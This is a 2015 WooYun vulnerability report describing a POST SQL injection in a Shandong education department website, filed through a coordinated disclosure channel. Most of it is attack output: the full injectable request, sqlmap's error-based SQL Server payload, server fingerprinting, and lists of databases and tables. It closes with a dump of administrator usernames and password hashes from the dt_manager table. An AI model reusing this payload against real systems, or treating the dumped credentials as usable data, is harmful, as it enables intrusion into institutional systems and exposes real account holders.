漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0156309
漏洞标题:看我是如何发现某省教育厅旗下站点之漏洞(POST注入+可跨数据库+管理员信息泄漏)
相关厂商:山东省教育厅高教处
漏洞作者: 路人甲
提交时间:2015-11-27 16:34
修复时间:2016-01-15 17:10
公开时间:2016-01-15 17:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开
简要描述:
RT。。。
详细说明:
某省教育厅高教处存在POST注入 数据库 等信息泄漏。。。
漏洞证明:
目标站点:**.**.**.**
POST注入:
URL:
http://**.**.**.**/plugins/Jglx/aspx/years.as
px?years=2015"
POST:
__VIEWSTATE=%2FwEPDwUJODg1Mjg4MjYyD2QWAgIDD2QWBAIBDxYCHgt
fIUl0ZW1Db3VudAI0FmhmD2QWAmYPFQMEMjAxNQExD%2Bi2hee6p%2BeuoeeQhuWRmGQCAQ9kFgJmDxU
DBDIwMTUBNw%2FpnZLlspvlt6XlrabpmaJkAgIPZBYCZg8VAwQyMDE1ATgS6Z2S5bKb6buE5rW35a2m6
ZmiZAIDD2QWAmYPFQMEMjAxNQIxMRXlsbHkuJzljY7lroflt6XlrabpmaJkAgQPZBYCZg8VAwQyMDE1A
jEzEuWxseS4nOWNj%2BWSjOWtpumZomQCBQ9kFgJmDxUDBDIwMTUCMTQS5bGx5Lic6Iux5omN5a2m6Zm
iZAIGD2QWAmYPFQMEMjAxNQIxNhLng5%2Flj7DljZflsbHlrabpmaJkAgcPZBYCZg8VAwQyMDE1AjE3E
umdkuWym%2Ba7qOa1t%2BWtpumZomQCCA9kFgJmDxUDBDIwMTUCMjAP5ruo5bee5Yy75a2m6ZmiZAIJD
2QWAmYPFQMEMjAxNQIyMwzmtY7ljZflpKflraZkAgoPZBYCZg8VAwQyMDE1AjI0GOa1juWNl%2BWkp%2
BWtpuazieWfjuWtpumZomQCCw9kFgJmDxUDBDIwMTUCMjUM5rWO5a6B5a2m6ZmiZAIMD2QWAmYPFQMEM
jAxNQIyNg%2FmtY7lroHljLvlrabpmaJkAg0PZBYCZg8VAwQyMDE1AjI3DOiBiuWfjuWkp%2BWtpmQCD
g9kFgJmDxUDBDIwMTUCMjkM6bKB5Lic5aSn5a2mZAIPD2QWAmYPFQMEMjAxNQIzMAzkuLTmsoLlpKflr
aZkAhAPZBYCZg8VAwQyMDE1AjMxDOmdkuWym%2BWkp%2BWtpmQCEQ9kFgJmDxUDBDIwMTUCMzIS6Z2S5
bKb56eR5oqA5aSn5a2mZAISD2QWAmYPFQMEMjAxNQIzMxLpnZLlspvnkIblt6XlpKflraZkAhMPZBYCZ
g8VAwQyMDE1AjM0HumdkuWym%2BeQhuW3peWkp%2BWtpueQtOWym%2BWtpumZomQCFA9kFgJmDxUDBDI
wMTUCMzUS6Z2S5bKb5Yac5Lia5aSn5a2mZAIVD2QWAmYPFQMEMjAxNQIzNxLmm7LpmJzluIjojIPlpKf
lraZkAhYPZBYCZg8VAwQyMDE1AjM4Eum9kOmygeW3peS4muWkp%2BWtpmQCFw9kFgJmDxUDBDIwMTUCN
DAS5bGx5Lic6LSi57uP5aSn5a2mZAIYD2QWAmYPFQMEMjAxNQI0MwzlsbHkuJzlpKflraZkAhkPZBYCZ
g8VAwQyMDE1AjQ1EuWxseS4nOW3peWVhuWtpumZomQCGg9kFgJmDxUDBDIwMTUCNDYY5bGx5Lic5bel6
Im6576O5pyv5a2m6ZmiZAIbD2QWAmYPFQMEMjAxNQI0NxLlsbHkuJzorablr5%2FlrabpmaJkAhwPZBY
CZg8VAwQyMDE1AjQ4EuWxseS4nOS6pOmAmuWtpumZomQCHQ9kFgJmDxUDBDIwMTUCNDkS5bGx5Lic5bu
6562R5aSn5a2mZAIeD2QWAmYPFQMEMjAxNQI1MBLlsbHkuJznp5HmioDlpKflraZkAh8PZBYCZg8VAwQ
yMDE1AjUyEuWxseS4nOeQhuW3peWkp%2BWtpmQCIA9kFgJmDxUDBDIwMTUCNTMS5bGx5Lic5Yac5Lia5
aSn5a2mZAIhD2QWAmYPFQMEMjAxNQI1NBjlsbHkuJzlhpzkuJrlt6XnqIvlrabpmaJkAiIPZBYCZg8VA
wQyMDE1AjU1EuWxseS4nOWls%2BWtkOWtpumZomQCIw9kFgJmDxUDBDIwMTUCNTYY5bGx5Lic6Z2S5bm
05pS%2F5rK75a2m6ZmiZAIkD2QWAmYPFQMEMjAxNQI1NxLlsbHkuJzluIjojIPlpKflraZkAiUPZBYCZ
g8VAwQyMDE1AjU4HuWxseS4nOW4iOiMg%2BWkp%2BWtpuWOhuWxseWtpumZomQCJg9kFgJmDxUDBDIwM
TUCNjAS5bGx5Lic6Im65pyv5a2m6ZmiZAInD2QWAmYPFQMEMjAxNQI2MRLlsbHkuJzmlL%2Fms5Xlrab
pmaJkAigPZBYCZg8VAwQyMDE1AjYyFeWxseS4nOS4reWMu%2BiNr%2BWkp%2BWtpmQCKQ9kFgJmDxUDB
DIwMTUCNjMM5rOw5bGx5a2m6ZmiZAIqD2QWAmYPFQMEMjAxNQI2NA%2Fms7DlsbHljLvlrabpmaJkAis
PZBYCZg8VAwQyMDE1AjY1DOa9jeWdiuWtpumZomQCLA9kFgJmDxUDBDIwMTUCNjYP5r2N5Z2K5Yy75a2
m6ZmiZAItD2QWAmYPFQMEMjAxNQI2Nwzng5%2Flj7DlpKflraZkAi4PZBYCZg8VAwQyMDE1AjY4GOeDn
%2BWPsOWkp%2BWtpuaWh%2Be7j%2BWtpumZomQCLw9kFgJmDxUDBDIwMTUCNjkS5Lit5Zu95rW35rSL5
aSn5a2mZAIwD2QWAmYPFQMEMjAxNQI3MB7kuK3lm73nn7PmsrnlpKflrabvvIjljY7kuJzvvIlkAjEPZ
BYCZg8VAwQyMDE1AjcxHuS4reWbveefs%2BayueWkp%2BWtpuiDnOWIqeWtpumZomQCMg9kFgJmDxUDB
DIwMTUCNzUY5bGx5Lic5aSn5a2m5aiB5rW35YiG5qChZAIzD2QWAmYPFQMEMjAxNQI4MgBkAgIPFgIfA
AJAFoABZg9kFgJmDxUDBDIwMTUBNw%2FpnZLlspvlt6XlrabpmaJkAgEPZBYCZg8VAwQyMDE1ATgS6Z2
S5bKb6buE5rW35a2m6ZmiZAICD2QWAmYPFQMEMjAxNQE5GOmdkuWym%2BaBkuaYn%2BenkeaKgOWtpum
ZomQCAw9kFgJmDxUDBDIwMTUCMTAS6b2Q6bKB55CG5bel5a2m6ZmiZAIED2QWAmYPFQMEMjAxNQIxMRX
lsbHkuJzljY7lroflt6XlrabpmaJkAgUPZBYCZg8VAwQyMDE1AjEyFeWxseS4nOS4h%2BadsOWMu%2BW
tpumZomQCBg9kFgJmDxUDBDIwMTUCMTMS5bGx5Lic5Y2P5ZKM5a2m6ZmiZAIHD2QWAmYPFQMEMjAxNQI
xNBLlsbHkuJzoi7HmiY3lrabpmaJkAggPZBYCZg8VAwQyMDE1AjE1Eua9jeWdiuenkeaKgOWtpumZomQ
CCQ9kFgJmDxUDBDIwMTUCMTYS54Of5Y%2Bw5Y2X5bGx5a2m6ZmiZAIKD2QWAmYPFQMEMjAxNQIxNxLpn
ZLlspvmu6jmtbflrabpmaJkAgsPZBYCZg8VAwQyMDE1AjE5DOa7qOW3nuWtpumZomQCDA9kFgJmDxUDB
DIwMTUCMjAP5ruo5bee5Yy75a2m6ZmiZAIND2QWAmYPFQMEMjAxNQIyMQzlvrflt57lrabpmaJkAg4PZ
BYCZg8VAwQyMDE1AjIyDOiPj%2BazveWtpumZomQCDw9kFgJmDxUDBDIwMTUCMjMM5rWO5Y2X5aSn5a2
mZAIQD2QWAmYPFQMEMjAxNQIyNBjmtY7ljZflpKflrabms4nln47lrabpmaJkAhEPZBYCZg8VAwQyMDE
1AjI1DOa1juWugeWtpumZomQCEg9kFgJmDxUDBDIwMTUCMjYP5rWO5a6B5Yy75a2m6ZmiZAITD2QWAmY
PFQMEMjAxNQIyNwzogYrln47lpKflraZkAhQPZBYCZg8VAwQyMDE1AjI4GOiBiuWfjuWkp%2BWtpuS4n
OaYjOWtpumZomQCFQ9kFgJmDxUDBDIwMTUCMjkM6bKB5Lic5aSn5a2mZAIWD2QWAmYPFQMEMjAxNQIzM
AzkuLTmsoLlpKflraZkAhcPZBYCZg8VAwQyMDE1AjMxDOmdkuWym%2BWkp%2BWtpmQCGA9kFgJmDxUDB
DIwMTUCMzIS6Z2S5bKb56eR5oqA5aSn5a2mZAIZD2QWAmYPFQMEMjAxNQIzMxLpnZLlspvnkIblt6Xlp
KflraZkAhoPZBYCZg8VAwQyMDE1AjM0HumdkuWym%2BeQhuW3peWkp%2BWtpueQtOWym%2BWtpumZomQ
CGw9kFgJmDxUDBDIwMTUCMzUS6Z2S5bKb5Yac5Lia5aSn5a2mZAIcD2QWAmYPFQMEMjAxNQIzNxLmm7L
pmJzluIjojIPlpKflraZkAh0PZBYCZg8VAwQyMDE1AjM4Eum9kOmygeW3peS4muWkp%2BWtpmQCHg9kF
gJmDxUDBDIwMTUCMzkS6b2Q6bKB5biI6IyD5a2m6ZmiZAIfD2QWAmYPFQMEMjAxNQI0MBLlsbHkuJzot
KLnu4%2FlpKflraZkAiAPZBYCZg8VAwQyMDE1AjQxHuWxseS4nOi0oue7j%2BWkp%2BWtpuS4nOaWueW
tpumZomQCIQ9kFgJmDxUDBDIwMTUCNDIe5bGx5Lic6LSi57uP5aSn5a2m54eV5bGx5a2m6ZmiZAIiD2Q
WAmYPFQMEMjAxNQI0MwzlsbHkuJzlpKflraZkAiMPZBYCZg8VAwQyMDE1AjQ0EuWxseS4nOeuoeeQhuW
tpumZomQCJA9kFgJmDxUDBDIwMTUCNDUS5bGx5Lic5bel5ZWG5a2m6ZmiZAIlD2QWAmYPFQMEMjAxNQI
0NhjlsbHkuJzlt6Xoibrnvo7mnK%2FlrabpmaJkAiYPZBYCZg8VAwQyMDE1AjQ3EuWxseS4nOitpuWvn
%2BWtpumZomQCJw9kFgJmDxUDBDIwMTUCNDgS5bGx5Lic5Lqk6YCa5a2m6ZmiZAIoD2QWAmYPFQMEMjA
xNQI0ORLlsbHkuJzlu7rnrZHlpKflraZkAikPZBYCZg8VAwQyMDE1AjUwEuWxseS4nOenkeaKgOWkp%2
BWtpmQCKg9kFgJmDxUDBDIwMTUCNTIS5bGx5Lic55CG5bel5aSn5a2mZAIrD2QWAmYPFQMEMjAxNQI1M
xLlsbHkuJzlhpzkuJrlpKflraZkAiwPZBYCZg8VAwQyMDE1AjU0GOWxseS4nOWGnOS4muW3peeoi%2BW
tpumZomQCLQ9kFgJmDxUDBDIwMTUCNTUS5bGx5Lic5aWz5a2Q5a2m6ZmiZAIuD2QWAmYPFQMEMjAxNQI
1NhjlsbHkuJzpnZLlubTmlL%2FmsrvlrabpmaJkAi8PZBYCZg8VAwQyMDE1AjU3EuWxseS4nOW4iOiMg
%2BWkp%2BWtpmQCMA9kFgJmDxUDBDIwMTUCNTge5bGx5Lic5biI6IyD5aSn5a2m5Y6G5bGx5a2m6ZmiZ
AIxD2QWAmYPFQMEMjAxNQI1ORLlsbHkuJzkvZPogrLlrabpmaJkAjIPZBYCZg8VAwQyMDE1AjYwEuWxs
eS4nOiJuuacr%2BWtpumZomQCMw9kFgJmDxUDBDIwMTUCNjES5bGx5Lic5pS%2F5rOV5a2m6ZmiZAI0D
2QWAmYPFQMEMjAxNQI2MhXlsbHkuJzkuK3ljLvoja%2FlpKflraZkAjUPZBYCZg8VAwQyMDE1AjYzDOa
zsOWxseWtpumZomQCNg9kFgJmDxUDBDIwMTUCNjQP5rOw5bGx5Yy75a2m6ZmiZAI3D2QWAmYPFQMEMjA
xNQI2NQzmvY3lnYrlrabpmaJkAjgPZBYCZg8VAwQyMDE1AjY2D%2Ba9jeWdiuWMu%2BWtpumZomQCOQ9
kFgJmDxUDBDIwMTUCNjcM54Of5Y%2Bw5aSn5a2mZAI6D2QWAmYPFQMEMjAxNQI2OBjng5%2Flj7DlpKf
lrabmlofnu4%2FlrabpmaJkAjsPZBYCZg8VAwQyMDE1AjY5EuS4reWbvea1t%2Ba0i%2BWkp%2BWtpmQ
CPA9kFgJmDxUDBDIwMTUCNzAe5Lit5Zu955%2Bz5rK55aSn5a2m77yI5Y2O5Lic77yJZAI9D2QWAmYPF
QMEMjAxNQI3MR7kuK3lm73nn7PmsrnlpKflrabog5zliKnlrabpmaJkAj4PZBYCZg8VAwQyMDE1AjcyD
Oaeo%2BW6hOWtpumZomQCPw9kFgJmDxUDBDIwMTUCNzUY5bGx5Lic5aSn5a2m5aiB5rW35YiG5qChZGT
Vr70yEl0FKONqfDZnIJIMAr%2BEUQ%3D%3D&__VIEWSTATEGENERATOR=7F45703A&scho=88952634
test:
sqlmap identified the following injection point(s) with a total of 280 HTTP(s) r
equests:
---
Parameter: scho (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=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
hZGTVr70yEl0FKONqfDZnIJIMAr+EUQ==&__VIEWSTATEGENERATOR=7F45703A&scho=88952634%'
AND 9171=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(112)+CHAR(113)+(
SELECT (CASE WHEN (9171=9171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(1
22)+CHAR(113)+CHAR(118)+CHAR(113))) AND '%'='
---
[13:32:16] [INFO] testing Microsoft SQL Server
[13:32:17] [INFO] confirming Microsoft SQL Server
[13:32:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[13:32:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[13:32:19] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 13:32:19
available databases [13]:
[*] ASPState
[*] DatabaseNamePlaceHolder
[*] DTcmsdb2
[*] DTcmsdb3
[*] master
[*] model
[*] msdb
[*] sdgspx_db
[*] tempdb
[*] Vocation_DTcmsdb3
[*] VoteOnlineDB
[*] ZhiChengOnlineDB
[*] ZhiChengOnlineDBNew
[13:34:46] [INFO] retrieved: zhicheng
current user: 'zhicheng'
[13:34:46] [INFO] fetching current database
[13:34:46] [INFO] retrieved: DTcmsdb3
current database: 'DTcmsdb3'
Database: DTcmsdb3
[74 tables]
+----------------------------+
| Mspx |
| Mspx_Exp |
| Mspx_ExpMark |
| Mspx_File |
| Mspx_TchMark |
| Mspx_View |
| Mspx_teacher |
| Mspx_xueke |
| Shpg_batch |
| Shpg_report |
| Shpg_report_mark |
| Table_1 |
| View_1 |
| View_2 |
| View_3 |
| dt_Dspj |
| dt_JglxTeacher |
| dt_Jglx_BBS |
| dt_Jglx_ExpText |
| dt_Jglx_Experts |
| dt_Jglx_File |
| dt_Jglx_ProAbout |
| dt_Jglx_ProAchieve |
| dt_Jglx_ProMembers |
| dt_Jglx_ProOutlay |
| dt_Jglx_ProPerson |
| dt_Jglx_ProPerson_Research |
| dt_Jglx_ProPerson_Resume |
| dt_Jglx_ProText |
| dt_Jglx_Type |
| dt_article |
| dt_article_albums |
| dt_article_attach |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category |
| dt_article_comment |
| dt_channel |
| dt_channel_category |
| dt_channel_field |
| dt_express |
| dt_feedback |
| dt_link |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_value |
| dt_minbandoc |
| dt_navigation |
| dt_order_goods |
| dt_orders |
| dt_payment |
| dt_pubendoc |
| dt_qsArticle |
| dt_sms_template |
| dt_user_amount_log |
| dt_user_code |
| dt_user_group_price |
| dt_user_groups |
| dt_user_login_log |
| dt_user_message |
| dt_user_oauth |
| dt_user_oauth_app |
| dt_user_point_log |
| dt_users |
| table2 |
| table3 |
| table4 |
| ttt |
| view_channel_content |
| view_channel_down |
| view_channel_news |
| view_channel_photo |
+----------------------------+
Database: DTcmsdb3
Table: dt_manager
[12 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| add_time | datetime |
| email | nvarchar |
| id | int |
| is_lock | int |
| password | nvarchar |
| real_name | nvarchar |
| role_id | int |
| role_type | int |
| salt | nvarchar |
| telephone | nvarchar |
| user_name | nvarchar |
| user_unit | nvarchar |
+-----------+----------+
Database: DTcmsdb3
Table: dt_manager
[77 entries]
+----+-----------------+----------------------------------+
| id | user_name | password |
+----+-----------------+----------------------------------+
| 1 | admin | 11BE2C16A0C5BF04172F0A1553A20279 |
| 10 | QLLGXY | 26031BFC8B4038B5D2A5EAE8D14E5099 |
| 11 | SDHYGXY | 877DFCB4BED87B4CEE8C65376B904977 |
| 12 | SDWJYXY | 44D8FF615EEB4AE2 |
| 13 | SDXHXY | A6E73F4A48AB08B55077C8E28772F4F1 |
| 14 | SDYCXY | 67269E38AD887CA1 |
| 15 | WFKJXY | DE2CF7CC37EBC6F0 |
| 16 | YTNSXY | 171F12F3893E76B5 |
| 17 | QDBHXY | 6360B00EE9134C13 |
| 18 | BJDYXYXDCYMTXY | C4F23FCC682EEE0D883ABE4F19B9F80A |
| 19 | BZXY | 26687989D8A43EAA |
| 20 | BZYXY | BE4121E9036B975EC7617129C83238EE |
| 21 | DZXY | C87F9E4DA99383983BABC0E652A808F9 |
| 22 | HZXY | 6B0E1652B906954C |
| 23 | JNDX | E8A10F8B06BEEF616DD4C2FDEA8A315C |
| 24 | JNDXQCXY | 4778C9FEBE151A7A1E8C18BCD58E830E |
| 25 | JNXY | AD7B39A812C2FC1B6C5276756B1753D1 |
